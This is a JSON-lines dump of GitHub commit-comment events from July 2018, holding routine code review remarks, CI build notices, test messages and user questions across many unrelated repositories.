{"id":"7991297680","type":"CommitCommentEvent","actor":{"login":"oliuz"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29769766,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T19:57:24Z","updated_at":"2018-07-19T19:57:24Z","author_association":"NONE","body":"The error shows it when I run the composer install to install the laravel dependencies \r\n and so I can run the app"}},"created_at":"2018-07-19T19:57:24Z"}
{"id":"7991298086","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29769770,"position":19,"line":20,"path":"Lesson1/Right_triangle.rb","commit_id":"687809ed94a5d7bfe3b7f2bbbd556b52cf8599bb","created_at":"2018-07-19T19:57:29Z","updated_at":"2018-07-19T19:57:29Z","author_association":"NONE","body":"Без then будет работать так-же. then используется крайне редко, и то скорее в case выражениях. Тут и в следующем блоке, это избыточно"}},"created_at":"2018-07-19T19:57:29Z"}
{"id":"7991304786","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29769780,"position":null,"line":null,"path":null,"commit_id":"9450abf6de8cae9956d1117fd65f86748c4c6105","created_at":"2018-07-19T19:58:55Z","updated_at":"2018-07-19T19:58:55Z","author_association":"COLLABORATOR","body":"The SubPackage branch has really fallen behind, and after its merge, I don't think its worth it to keep. @JacquesCarette @szymczdm can we close it?"}},"created_at":"2018-07-19T19:58:55Z"}
{"id":"7991306021","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29769783,"position":19,"line":20,"path":"Lesson1/Right_triangle.rb","commit_id":"687809ed94a5d7bfe3b7f2bbbd556b52cf8599bb","created_at":"2018-07-19T19:59:11Z","updated_at":"2018-07-19T19:59:11Z","author_association":"NONE","body":"Вот эту ветку, лучше оставить тут. И прервать выполнение программы используя exit например. Потому-что, если треугольник равносторонний, то он точно не будет прямоугольным."}},"created_at":"2018-07-19T19:59:11Z"}
{"id":"7991308020","type":"CommitCommentEvent","actor":{"login":"bilaltariq2122"},"repo":{"name":"parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation"},"payload":{"comment":{"id":29769788,"position":null,"line":null,"path":null,"commit_id":"2d9977cd4ad365ba7b7c946bce86ab924abf94e7","created_at":"2018-07-19T19:59:37Z","updated_at":"2018-07-19T19:59:37Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/36131623/42966947-1c83966e-8bb8-11e8-9c54-da0b9e0b0cef.png)\r\n\r\ncan u plz send me .mat files for this code.\r\ni shall be very thankful to u ."}},"created_at":"2018-07-19T19:59:37Z"}
{"id":"7991308497","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29769790,"position":null,"line":null,"path":null,"commit_id":"5743cd7092c69ab2a724a3c02c65fd806e2a10bd","created_at":"2018-07-19T19:59:43Z","updated_at":"2018-07-19T19:59:43Z","author_association":"MEMBER","body":"Doh, https://github.com/StylishThemes/GitHub-Dark/commit/54741e421c96028742ced50264af0366bd4e130c."}},"created_at":"2018-07-19T19:59:43Z"}
{"id":"7991308849","type":"CommitCommentEvent","actor":{"login":"thysultan"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29769792,"position":23,"line":584,"path":"test/Render.spec.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T19:59:48Z","updated_at":"2018-07-19T19:59:48Z","author_association":"OWNER","body":"Assigning to the `.form` property(any value) throws(its readonly). the `doesNotThrow ` tests that this doesn't happen."}},"created_at":"2018-07-19T19:59:48Z"}
{"id":"7986415180","type":"CommitCommentEvent","actor":{"login":"bryankim96"},"repo":{"name":"ctlearn-project/ctlearn"},"payload":{"comment":{"id":29758416,"position":null,"line":null,"path":null,"commit_id":"70a6ac30892e9301672d28e4d2b92d0d393fb6a4","created_at":"2018-07-19T02:00:16Z","updated_at":"2018-07-19T02:00:16Z","author_association":"COLLABORATOR","body":"I don't think it would make all errors obvious. For example, say that hypothetically an integer (10) was incorrectly parsed as a string ('10') or something like that. Because the saved config is produced with yaml.dump() I think that field will show up as the same 10 either way and it wouldn't be obvious there. However, there could be internal bugs caused by something like this. "}},"created_at":"2018-07-19T02:00:16Z"}
{"id":"7986415648","type":"CommitCommentEvent","actor":{"login":"ashwinstar"},"repo":{"name":"asimrp/postgres"},"payload":{"comment":{"id":29758418,"position":5,"line":1090,"path":"src/backend/utils/misc/guc.c","commit_id":"b441bafaab107e01474807af5da09c1da0eb1253","created_at":"2018-07-19T02:00:26Z","updated_at":"2018-07-19T02:00:26Z","author_association":"NONE","body":"I think upstream would prefer config variable over guc for this framework to completely avoid its overhead in production similar to relcache or memory clobber."}},"created_at":"2018-07-19T02:00:26Z"}
{"id":"7986420249","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719020156048"},"payload":{"comment":{"id":29758422,"position":null,"line":null,"path":null,"commit_id":"48c9d908375f0b6cfe486ca58326e17d0fbb7948","created_at":"2018-07-19T02:02:00Z","updated_at":"2018-07-19T02:02:00Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T02:02:00Z"}
{"id":"7986420497","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719020201815"},"payload":{"comment":{"id":29758423,"position":null,"line":null,"path":null,"commit_id":"4271ef8d2d48d7b6d071fd622738083a0e26e248","created_at":"2018-07-19T02:02:05Z","updated_at":"2018-07-19T02:02:05Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T02:02:05Z"}
{"id":"7986420801","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719020208187"},"payload":{"comment":{"id":29758424,"position":null,"line":null,"path":null,"commit_id":"f48e0cd34a605b8c2c9ca6f29117e952aec0efd2","created_at":"2018-07-19T02:02:11Z","updated_at":"2018-07-19T02:02:11Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T02:02:11Z"}
{"id":"7986421043","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719020212963"},"payload":{"comment":{"id":29758425,"position":null,"line":null,"path":null,"commit_id":"2acfbf49c2ad46df192086562b551301d64ff4e9","created_at":"2018-07-19T02:02:17Z","updated_at":"2018-07-19T02:02:17Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T02:02:17Z"}
{"id":"7986422750","type":"CommitCommentEvent","actor":{"login":"mgage"},"repo":{"name":"mgage/"},"payload":{"comment":{"id":29758427,"position":16,"line":570,"path":"clients/sendXMLRPC.pl","commit_id":"24a2c89e51c67ef6c7a527d19de860a514a441b5","created_at":"2018-07-19T02:02:53Z","updated_at":"2018-07-19T02:02:53Z","author_association":"OWNER","body":"Oops.  Thanks."}},"created_at":"2018-07-19T02:02:53Z"}
{"id":"7986422750","type":"CommitCommentEvent","actor":{"login":"mgage"},"repo":{"name":"mgage/"},"payload":{"comment":{"id":29758427,"position":16,"line":570,"path":"clients/sendXMLRPC.pl","commit_id":"24a2c89e51c67ef6c7a527d19de860a514a441b5","created_at":"2018-07-19T02:02:53Z","updated_at":"2018-07-19T02:02:53Z","author_association":"OWNER","body":"Oops.  Thanks."}},"created_at":"2018-07-19T02:02:53Z"}
{"id":"7986422972","type":"CommitCommentEvent","actor":{"login":"azdanov"},"repo":{"name":"jorgegonzalez/zoe"},"payload":{"comment":{"id":29758428,"position":null,"line":null,"path":null,"commit_id":"fa2e0fbcc13f69eeb270bcdfa0435de56317969e","created_at":"2018-07-19T02:02:59Z","updated_at":"2018-07-19T02:02:59Z","author_association":"COLLABORATOR","body":"@jorgegonzalez It still fails on windows since `node 6` didn't have `promisify` that I'm using. Either need to disable testing on `node 6` or polyfill using webpack.\r\n\r\nAlso need some way to figure out how to test snapshots, since system path separators and line endings are different."}},"created_at":"2018-07-19T02:02:59Z"}
{"id":"7986424493","type":"CommitCommentEvent","actor":{"login":"aribrill"},"repo":{"name":"ctlearn-project/ctlearn"},"payload":{"comment":{"id":29758430,"position":null,"line":null,"path":null,"commit_id":"4e46949e075747d045bd07ca5fe603d15d62a564","created_at":"2018-07-19T02:03:30Z","updated_at":"2018-07-19T02:03:30Z","author_association":"COLLABORATOR","body":"I feel like making apply_processing be False by default could lead to a bad experience in which a user provides configuration for data processing, reasonably expecting it to do something, but because apply_processing is False CTLearn silently does nothing. Whereas if you don't manually set any data processing arguments I think it's a reasonable expectation for nothing to happen, which would be violated by setting active defaults. Since data processing involves messing around with the data, I think it's natural that the user would want to specify exactly what they want to do, not rely on defaults. Having the default be turning on processing, but making the default the \"identity operation\", seems like a good compromise to me."}},"created_at":"2018-07-19T02:03:30Z"}
{"id":"7986424508","type":"CommitCommentEvent","actor":{"login":"panzhi1"},"repo":{"name":"tonyhb/react-native-camera"},"payload":{"comment":{"id":29758431,"position":null,"line":null,"path":null,"commit_id":"93053c2e2ac19afb3953e63027a6c0648cd8b556","created_at":"2018-07-19T02:03:30Z","updated_at":"2018-07-19T02:03:30Z","author_association":"NONE","body":"The camera took 0.7s to enter the ShutterCallback callback"}},"created_at":"2018-07-19T02:03:30Z"}
{"id":"7986427184","type":"CommitCommentEvent","actor":{"login":"RaiderSoap"},"repo":{"name":"coursegraph/CourseGraph"},"payload":{"comment":{"id":29758432,"position":null,"line":null,"path":null,"commit_id":"91ce1dccf7dd255cc5fb12f3b6da351d577a9d0b","created_at":"2018-07-19T02:04:27Z","updated_at":"2018-07-19T02:04:27Z","author_association":"MEMBER","body":"Cleanup codes"}},"created_at":"2018-07-19T02:04:27Z"}
{"id":"7986427795","type":"CommitCommentEvent","actor":{"login":"jorgegonzalez"},"repo":{"name":"jorgegonzalez/zoe"},"payload":{"comment":{"id":29758433,"position":null,"line":null,"path":null,"commit_id":"fa2e0fbcc13f69eeb270bcdfa0435de56317969e","created_at":"2018-07-19T02:04:40Z","updated_at":"2018-07-19T02:04:40Z","author_association":"OWNER","body":"I don't think we should support `node 6` at the moment anyway. Go ahead and remove it."}},"created_at":"2018-07-19T02:04:40Z"}
{"id":"7986430881","type":"CommitCommentEvent","actor":{"login":"classilla"},"repo":{"name":"classilla/tenfourfox"},"payload":{"comment":{"id":29758435,"position":null,"line":null,"path":null,"commit_id":"b6afdab5d473e5508f9af8cf28da92b0691160a6","created_at":"2018-07-19T02:05:46Z","updated_at":"2018-07-19T02:05:46Z","author_association":"OWNER","body":"I don't see why I would bloat the internal cert store for a field we can't use right now."}},"created_at":"2018-07-19T02:05:46Z"}
{"id":"7986434012","type":"CommitCommentEvent","actor":{"login":"Asion-J"},"repo":{"name":"1715173329/SSTab-Rule"},"payload":{"comment":{"id":29758442,"position":null,"line":null,"path":null,"commit_id":"428c6f49cc743bf141a35c675f3daf1b09314f0b","created_at":"2018-07-19T02:06:55Z","updated_at":"2018-07-19T02:06:55Z","author_association":"NONE","body":"23.32.0.0/11\r\n23.48.201.0/24\r\n61.244.0.0/16\r\n61.244.24.0/22\r\n103.44.60.0/22\r\n103.44.61.0/24\r\n103.235.44.0/22\r\n103.235.46.0/24\r\n155.133.244.0/24\r\n175.45.0.0/18\r\n175.45.32.0/19\r\n175.45.42.0/23"}},"created_at":"2018-07-19T02:06:55Z"}
{"id":"7986434193","type":"CommitCommentEvent","actor":{"login":"Lazersmoke"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29758443,"position":8,"line":8,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/ConstEnchantmentOffer.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-19T02:07:00Z","updated_at":"2018-07-19T02:07:00Z","author_association":"NONE","body":"The alternative would be `public int getCost()`, which doesn't really solve anything since if you changed `cost` to e.g. `long`, you would have to \"lie\" and convert back to `int` to save the same interface."}},"created_at":"2018-07-19T02:07:00Z"}
{"id":"7986438839","type":"CommitCommentEvent","actor":{"login":"aribrill"},"repo":{"name":"ctlearn-project/ctlearn"},"payload":{"comment":{"id":29758449,"position":null,"line":null,"path":null,"commit_id":"70a6ac30892e9301672d28e4d2b92d0d393fb6a4","created_at":"2018-07-19T02:08:45Z","updated_at":"2018-07-19T02:08:45Z","author_association":"COLLABORATOR","body":"Ok, that makes sense. It's only in debug mode so printing a lot to the screen is not a big deal. Let's restore this functionality."}},"created_at":"2018-07-19T02:08:45Z"}
{"id":"7986442489","type":"CommitCommentEvent","actor":{"login":"vtamara"},"repo":{"name":"pasosdeJesus/sivel2_gen"},"payload":{"comment":{"id":29758455,"position":null,"line":null,"path":null,"commit_id":"c30508695b7c7dabf058472bb21986cf550bbcf8","created_at":"2018-07-19T02:10:08Z","updated_at":"2018-07-19T02:10:08Z","author_association":"MEMBER","body":"Closes #10 "}},"created_at":"2018-07-19T02:10:08Z"}
{"id":"7986444654","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29758458,"position":null,"line":null,"path":null,"commit_id":"2d1352d9897d84a97d737a2581f4cae47a53a9b2","created_at":"2018-07-19T02:10:54Z","updated_at":"2018-07-19T02:10:54Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1695 of 1695 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-19T02:10:54Z"}
{"id":"7986447076","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29758465,"position":null,"line":null,"path":null,"commit_id":"e312bd5f04660913c515ee66af983b90bc5828fc","created_at":"2018-07-19T02:11:48Z","updated_at":"2018-07-19T02:11:48Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.233`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/233) :tada:"}},"created_at":"2018-07-19T02:11:48Z"}
{"id":"7986449599","type":"CommitCommentEvent","actor":{"login":"a89897768"},"repo":{"name":"a89897768/Test2"},"payload":{"comment":{"id":29758469,"position":null,"line":null,"path":null,"commit_id":"9f1063eb0708ed335db4c44197ddf6dc281246fa","created_at":"2018-07-19T02:12:47Z","updated_at":"2018-07-19T02:12:47Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-19T02:12:47Z"}
{"id":"7986449779","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29758470,"position":null,"line":null,"path":null,"commit_id":"e312bd5f04660913c515ee66af983b90bc5828fc","created_at":"2018-07-19T02:12:51Z","updated_at":"2018-07-19T02:12:51Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.353`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/405626412) :tada:"}},"created_at":"2018-07-19T02:12:51Z"}
{"id":"7986451277","type":"CommitCommentEvent","actor":{"login":"Junwei-Z"},"repo":{"name":"Junwei-Z/Econ-Projects"},"payload":{"comment":{"id":29758472,"position":null,"line":null,"path":null,"commit_id":"b498431b770d8127673ffec6091d3be14f0d6eb8","created_at":"2018-07-19T02:13:25Z","updated_at":"2018-07-19T02:13:25Z","author_association":"OWNER","body":"My paper tests the structural break and examines the stability of the Phillips curve by describing the relationship between the inflation rates and the unemployment rates in the United States via using the data of the most recent 31 years based on semiannual data through constructing a simple linear regression model. My paper concludes that the Phillips curve is sensitive to the economic environment and is unstable during the recession period."}},"created_at":"2018-07-19T02:13:25Z"}
{"id":"7986451854","type":"CommitCommentEvent","actor":{"login":"DFCO"},"repo":{"name":"DFCO/hello-world"},"payload":{"comment":{"id":29758474,"position":null,"line":null,"path":null,"commit_id":"9e72fbda8c0b951a19f9977467fac637974dbd40","created_at":"2018-07-19T02:13:37Z","updated_at":"2018-07-19T02:13:37Z","author_association":"OWNER","body":"This is my first commit"}},"created_at":"2018-07-19T02:13:37Z"}
{"id":"7986452484","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29758475,"position":4,"line":233,"path":"python/py-graveyard/Portfile","commit_id":"be83b67a0fa270989f2ac4d862aefa3d6f411c89","created_at":"2018-07-19T02:13:51Z","updated_at":"2018-07-19T02:13:51Z","author_association":"MEMBER","body":"EOL'ed Python versions do not receive security fixes. I don't think there's a reason stronger than security for deciding which Python version to use."}},"created_at":"2018-07-19T02:13:51Z"}
{"id":"7986453320","type":"CommitCommentEvent","actor":{"login":"DFCO"},"repo":{"name":"DFCO/hello-world"},"payload":{"comment":{"id":29758479,"position":2,"line":2,"path":"README.md","commit_id":"9e72fbda8c0b951a19f9977467fac637974dbd40","created_at":"2018-07-19T02:14:11Z","updated_at":"2018-07-19T02:14:11Z","author_association":"OWNER","body":"hello this is my first commit"}},"created_at":"2018-07-19T02:14:11Z"}
{"id":"7986455068","type":"CommitCommentEvent","actor":{"login":"bryankim96"},"repo":{"name":"ctlearn-project/ctlearn"},"payload":{"comment":{"id":29758483,"position":null,"line":null,"path":null,"commit_id":"4e46949e075747d045bd07ca5fe603d15d62a564","created_at":"2018-07-19T02:14:51Z","updated_at":"2018-07-19T02:14:51Z","author_association":"COLLABORATOR","body":"I see, that's a good point. My sense in this matter is that if a user was to run the default config file without looking at it, it is correct to apply no processing (which is true for either of our approaches). However if the person then takes the time to look at the config and notice the data processing settings which are on (or even modify them), and therefore expects something to happen, I dont think its unreasonable to expect them to have located the option for apply_processing, especially because they will need to modify the data files setting in the example config for things to work at all, and apply processing is right below it. \r\n\r\nThe main reason I thought it would be good to have such a flag is that it makes it simple to toggle processing as a whole on and off without having to go through every single setting and put in the correct option for no action. If possible, I think it might be good to try to demonstrate this usage in the example config if we can."}},"created_at":"2018-07-19T02:14:51Z"}
{"id":"7986455166","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29758484,"position":null,"line":null,"path":null,"commit_id":"fcbf647af8987339d859bc541ccb9d1a957b1408","created_at":"2018-07-19T02:14:53Z","updated_at":"2018-07-19T02:14:53Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-19T02:14:53Z"}
{"id":"7986459999","type":"CommitCommentEvent","actor":{"login":"darkonejr"},"repo":{"name":"herotc/hero-rotation"},"payload":{"comment":{"id":29758493,"position":529,"line":230,"path":"HeroRotation_Hunter/Marksmanship.lua","commit_id":"b3fa98d760651590fb90fe8ea73bbc819d896555","created_at":"2018-07-19T02:16:37Z","updated_at":"2018-07-19T02:16:37Z","author_association":"NONE","body":"Bestial Wrath is BM only, no?"}},"created_at":"2018-07-19T02:16:37Z"}
{"id":"7986461002","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29758496,"position":null,"line":null,"path":null,"commit_id":"e312bd5f04660913c515ee66af983b90bc5828fc","created_at":"2018-07-19T02:16:58Z","updated_at":"2018-07-19T02:16:58Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.353`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/405626412) :tada:"}},"created_at":"2018-07-19T02:16:58Z"}
{"id":"7986461480","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29758497,"position":null,"line":null,"path":null,"commit_id":"8be73634e045aa87186dbb01c07ee652d7afaa9f","created_at":"2018-07-19T02:17:09Z","updated_at":"2018-07-19T02:17:09Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-fpg-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-fpg-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-fpg-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-19T02:17:09Z"}
{"id":"7986464228","type":"CommitCommentEvent","actor":{"login":"jteresco"},"repo":{"name":"TravelMapping/HighwayData"},"payload":{"comment":{"id":29758500,"position":null,"line":null,"path":null,"commit_id":"f2402c8116c824eed613ec1c10db62a6d00191ae","created_at":"2018-07-19T02:18:10Z","updated_at":"2018-07-19T02:18:10Z","author_association":"CONTRIBUTOR","body":"@mapcat it will be back for tonight's update, thanks for the catch."}},"created_at":"2018-07-19T02:18:10Z"}
{"id":"7986468856","type":"CommitCommentEvent","actor":{"login":"Arrith"},"repo":{"name":"Arrith/yaritakunai"},"payload":{"comment":{"id":29758504,"position":null,"line":null,"path":null,"commit_id":"e752b6715bb47f50bd1eb64bda7b713e520e8797","created_at":"2018-07-19T02:19:53Z","updated_at":"2018-07-19T02:19:53Z","author_association":"OWNER","body":"しまった"}},"created_at":"2018-07-19T02:19:53Z"}
{"id":"7986475165","type":"CommitCommentEvent","actor":{"login":"wlgud54321"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29758508,"position":null,"line":null,"path":null,"commit_id":"8ed6f4f02965f2e555303811ad28d14b047f52d4","created_at":"2018-07-19T02:22:15Z","updated_at":"2018-07-19T02:22:15Z","author_association":"NONE","body":"hey i have question,(-)is new or (+)is new?i use it first,so i don't know what is new"}},"created_at":"2018-07-19T02:22:15Z"}
{"id":"7986476723","type":"CommitCommentEvent","actor":{"login":"hamishwillee"},"repo":{"name":"PX4/Devguide"},"payload":{"comment":{"id":29758510,"position":8,"line":120,"path":"en/flight_stack/controller_diagrams.md","commit_id":"7c483e1ca5f3bb51a6daae713b2e2039e86a661a","created_at":"2018-07-19T02:22:50Z","updated_at":"2018-07-19T02:22:50Z","author_association":"COLLABORATOR","body":"I think this is a typo: \r\n\r\n> (e.g.: an airplane that can fly between 15 and 15m/s should be tuned at 20m/s). \r\n\r\nChange:\r\n\r\n> This \"tuning\" airspeed has then to be set in the `FW_AIRSPD_TRIM` parameter.\r\n\r\nTO\r\n\r\n> This \"tuning\" airspeed should be set in the [FW_AIRSPD_TRIM(../advanced/parameter_reference.md#FW_AIRSPD_TRIM) parameter."}},"created_at":"2018-07-19T02:22:50Z"}
{"id":"7986504243","type":"CommitCommentEvent","actor":{"login":"kmacdon"},"repo":{"name":"kmacdon/kmacdon.github.io"},"payload":{"comment":{"id":29758534,"position":null,"line":null,"path":null,"commit_id":"dcdb7c7294e9bee429793fdce808795af5b6b831","created_at":"2018-07-19T02:33:02Z","updated_at":"2018-07-19T02:33:02Z","author_association":"OWNER","body":"For some reason git isn't recognizing the changes in index.html so I'm manually making differences."}},"created_at":"2018-07-19T02:33:02Z"}
{"id":"7986505064","type":"CommitCommentEvent","actor":{"login":"nashif"},"repo":{"name":"zephyrproject-rtos/zephyr"},"payload":{"comment":{"id":29758536,"position":4,"line":355,"path":"CMakeLists.txt","commit_id":"e6bf79b0c28048708aa4e7776cd457f525c16037","created_at":"2018-07-19T02:33:19Z","updated_at":"2018-07-19T02:33:19Z","author_association":"MEMBER","body":"Why is code generation needed? I do not see you doing anything in the script beside writing a file, this does not need to be auto-generated."}},"created_at":"2018-07-19T02:33:19Z"}
{"id":"7986507291","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/hdat"},"payload":{"comment":{"id":29758539,"position":3,"line":71,"path":"hdat/hdat_cli.py","commit_id":"1be74cb8af11eb848c2c816d45550a1d744bb311","created_at":"2018-07-19T02:34:07Z","updated_at":"2018-07-19T02:34:07Z","author_association":"CONTRIBUTOR","body":"Its strange; I guess this line was not being used at all prior to this commit!"}},"created_at":"2018-07-19T02:34:07Z"}
{"id":"7986508523","type":"CommitCommentEvent","actor":{"login":"nashif"},"repo":{"name":"zephyrproject-rtos/zephyr"},"payload":{"comment":{"id":29758540,"position":24,"line":24,"path":"scripts/gen_version_header.py","commit_id":"e6bf79b0c28048708aa4e7776cd457f525c16037","created_at":"2018-07-19T02:34:31Z","updated_at":"2018-07-19T02:34:31Z","author_association":"MEMBER","body":"originally this struct had more members, beside the actual kernel version of Zephyr, why did we drop them?"}},"created_at":"2018-07-19T02:34:31Z"}
{"id":"7986509806","type":"CommitCommentEvent","actor":{"login":"nashif"},"repo":{"name":"zephyrproject-rtos/zephyr"},"payload":{"comment":{"id":29758541,"position":45,"line":45,"path":"scripts/gen_version_header.py","commit_id":"e6bf79b0c28048708aa4e7776cd457f525c16037","created_at":"2018-07-19T02:35:02Z","updated_at":"2018-07-19T02:35:02Z","author_association":"MEMBER","body":"you are just writing the strings into a file, why do we need the script for that?"}},"created_at":"2018-07-19T02:35:02Z"}
{"id":"7986513770","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/hdat"},"payload":{"comment":{"id":29758547,"position":11,"line":77,"path":"hdat/hdat_cli.py","commit_id":"1be74cb8af11eb848c2c816d45550a1d744bb311","created_at":"2018-07-19T02:36:33Z","updated_at":"2018-07-19T02:36:33Z","author_association":"CONTRIBUTOR","body":"When would we ever hit this `else`?  I guess it would only occur if `args.casespecs` is empty, right?"}},"created_at":"2018-07-19T02:36:33Z"}
{"id":"7986517044","type":"CommitCommentEvent","actor":{"login":"smurching"},"repo":{"name":"databricks/mlflow"},"payload":{"comment":{"id":29758551,"position":5,"line":10,"path":"tests/projects/utils.py","commit_id":"4061cc931edebed42d5dfeeb3f867a34f4e70a7e","created_at":"2018-07-19T02:37:52Z","updated_at":"2018-07-19T02:37:52Z","author_association":"CONTRIBUTOR","body":"We no longer need this right? Thanks for making the switch to a local repo :)"}},"created_at":"2018-07-19T02:37:52Z"}
{"id":"7986518927","type":"CommitCommentEvent","actor":{"login":"happybai"},"repo":{"name":"lele88lala/react-lol"},"payload":{"comment":{"id":29758555,"position":2,"line":2,"path":"src/styles/_nav.scss","commit_id":"cd441f6676b660c5c38761d2617cc6d3d7578e9b","created_at":"2018-07-19T02:38:35Z","updated_at":"2018-07-19T02:38:35Z","author_association":"NONE","body":"Better to add a space after the colon. For all css styles. Such as padding: 0px. It will more readable."}},"created_at":"2018-07-19T02:38:35Z"}
{"id":"7986519120","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29758556,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T02:38:39Z","updated_at":"2018-07-19T02:38:39Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-19T02:38:39Z"}
{"id":"7986520351","type":"CommitCommentEvent","actor":{"login":"kedarv"},"repo":{"name":"BoilerMake/launchpad"},"payload":{"comment":{"id":29758557,"position":null,"line":null,"path":null,"commit_id":"4d062953045552b49ffb58c5991a1c106778a45f","created_at":"2018-07-19T02:39:07Z","updated_at":"2018-07-19T02:39:07Z","author_association":"MEMBER","body":"Can this be converted into an env variable / something configurable? Would be a nice upstream contribution!"}},"created_at":"2018-07-19T02:39:07Z"}
{"id":"7986520951","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29758559,"position":null,"line":null,"path":null,"commit_id":"21f56e81955b87473389674c2a3b694dd553a0fb","created_at":"2018-07-19T02:39:21Z","updated_at":"2018-07-19T02:39:21Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-56](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-56).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-56-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-19T02:39:21Z"}
{"id":"7986522333","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"endlessm/coding-discovery-center"},"payload":{"comment":{"id":29758561,"position":1,"line":1,"path":"data/meson.build","commit_id":"bc07945e128b3aa03167263e8a17af9b5f7e6b22","created_at":"2018-07-19T02:39:51Z","updated_at":"2018-07-19T02:39:51Z","author_association":"CONTRIBUTOR","body":"I think the default policy with anything that is marked open source is that it is LGPLv2. Tagging @cosimoc here to check."}},"created_at":"2018-07-19T02:39:51Z"}
